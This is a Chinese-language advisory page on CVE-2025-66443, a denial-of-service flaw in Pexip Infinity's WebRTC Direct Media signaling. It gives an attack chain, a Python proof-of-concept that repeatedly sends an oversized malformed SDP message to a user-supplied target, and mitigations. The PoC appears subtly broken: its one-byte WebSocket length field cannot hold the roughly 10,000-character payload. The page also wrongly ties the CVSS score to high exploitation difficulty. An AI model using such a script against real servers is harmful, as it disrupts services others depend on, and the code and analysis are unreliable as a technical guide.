CVE-2025-66443 Pexip Infinity 拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-66443

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Pexip Infinity

漏洞概述

CVE-2025-66443是Pexip Infinity视频会议平台中的一个高危拒绝服务漏洞。该漏洞存在于Pexip Infinity 35.0至38.1版本中，在使用Direct Media for WebRTC的非默认配置下，信号传递环节存在输入验证不当的问题。攻击者可以通过网络发送特制的恶意信号消息，无需任何认证即可触发软件异常终止，导致服务暂时中断。由于该漏洞影响视频会议系统的可用性，对于依赖Pexip进行关键业务沟通的组织可能造成严重影响。CVSS评分7.5表明该漏洞具有较高的利用难度但影响显著，属于高危级别安全缺陷。

技术细节

该漏洞的根本原因在于Pexip Infinity在处理WebRTC Direct Media配置下的信令消息时，缺乏充分的输入验证机制。攻击者构造特定的畸形信令数据包并发送到目标服务器，当服务器解析这些恶意输入时，会触发断言失败或未定义行为，导致软件进程异常终止。由于漏洞位于信令处理模块，且Direct Media功能涉及媒体流传输的关键路径，因此即使是非认证攻击者也能造成服务中断。攻击者可通过发送包含异常字段、格式错误或超出预期范围的信令消息来触发该漏洞，无需建立实际的媒体会话即可实现拒绝服务攻击。

攻击链分析

STEP 1

步骤1

识别运行Pexip Infinity 35.0-38.1版本且启用Direct Media for WebRTC配置的目标服务器

STEP 2

步骤2

构造包含畸形数据的WebRTC信令消息，故意违反协议规范

STEP 3

步骤3

通过WebSocket或HTTPS向目标服务器发送恶意信令数据包

STEP 4

步骤4

服务器信令处理模块接收并解析畸形输入，触发断言失败

STEP 5

步骤5

软件进程异常终止，视频会议服务暂时不可用

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-66443 PoC - Pexip Infinity DoS via Malformed Signaling
# Affected: Pexip Infinity 35.0-38.1 (Direct Media for WebRTC)

import socket
import struct
import random

def create_malformed_sdp():
    """Generate malformed SDP to trigger input validation error"""
    sdp = "v=0\r\n"
    sdp += "o=- {} {} IN IP4 127.0.0.1\r\n".format(random.randint(1, 999999), random.randint(1, 999999))
    sdp += "s=Malformed Session\r\n"
    sdp += "c=IN IP4 0.0.0.0\r\n"
    # Malformed attribute causing validation failure
    sdp += "a=control:{}:\r\n".format("A" * 10000)
    sdp += "t=0 0\r\n"
    return sdp

def send_malformed_signaling(target_ip, target_port=443):
    """Send malformed signaling message to Pexip Infinity"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        
        # WebSocket handshake
        ws_key = "SmFWS2V5" + str(random.randint(100000, 999999))
        request = f"GET / HTTP/1.1\r\n"
        request += f"Host: {target_ip}:{target_port}\r\n"
        request += "Upgrade: websocket\r\n"
        request += f"Sec-WebSocket-Key: {ws_key}\r\n"
        request += "Connection: Upgrade\r\n"
        request += "\r\n"
        
        sock.send(request.encode())
        
        # Send malformed signaling frame
        payload = create_malformed_sdp()
        frame = b'\x81' + bytes([len(payload)])
        sock.send(frame + payload.encode('utf-8'))
        
        sock.close()
        return True
    except Exception as e:
        print(f"Error: {e}")
        return False

if __name__ == "__main__":
    target = input("Enter target IP: ")
    print(f"Sending malformed signaling to {target}...")
    for i in range(10):
        send_malformed_signaling(target)
        print(f"Packet {i+1} sent")

影响范围

Pexip Infinity 35.0

Pexip Infinity 35.1

Pexip Infinity 36.0

Pexip Infinity 37.0

Pexip Infinity 38.0

Pexip Infinity 38.1

防御指南

临时缓解措施

在官方修复版本发布前，建议临时禁用Direct Media for WebRTC功能，限制暴露的攻击面。同时在网络层面对WebRTC信令端口实施访问控制，仅允许受信任的IP地址访问。对于必须使用该功能的场景，可通过负载均衡器实现流量监控和异常阻断，并准备应急预案以便在遭受攻击时快速恢复服务。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66443
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66443
3 Details https://www.cvedetails.com/cve/CVE-2025-66443/
4 VulDB https://vuldb.com/cve/CVE-2025-66443
5 Link https://docs.pexip.com/admin/security_bulletins.htm